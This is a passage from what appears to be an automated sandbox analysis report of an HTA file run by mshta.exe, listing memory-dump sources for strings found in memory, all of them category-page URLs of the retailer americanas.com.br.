00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebes?chave=pc_cat_menu_bebes_mercado
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-alcoolicas/vinho
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555668791.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-alcoolicas?chave=pc_cat_menu_bebidas
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-nao-alcoolicas?chave=pc_cat_menu_beb
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578801293.000000000BE2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508834101.000000000BE2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas?chave=dk_hm_at_bebidas
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578601158.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512492941.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510268517.000000000BDC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bomboniere?chave=pc_cat_menu_bombiniere_mercado
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado?chave=pc_cat_home_depart_mercado
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577607629.000000000AADD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494770867.000000000AADA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508517476.000000000BE57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502799829.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado?chave=pc_cat_menu_mercado
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moda?chave=pfm_home_moda_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486575456.0000000009DAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509041649.000000000BE06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486650176.0000000009DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/cama?chave=pfm_hm_tt_1_0_cama
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507926809.000000000BE97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509041649.000000000BE06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/colchao?chave=pfm_hm_tt_1_0_colchao
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/cozinha-compacta?chave=pfm_hm_tt_1_0_cozinha-compacta
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/cozinha-modulada?chave=pfm_hm_tt_1_0_cozinha-modulada
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/escritorio/cadeiras-para-escritorio
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 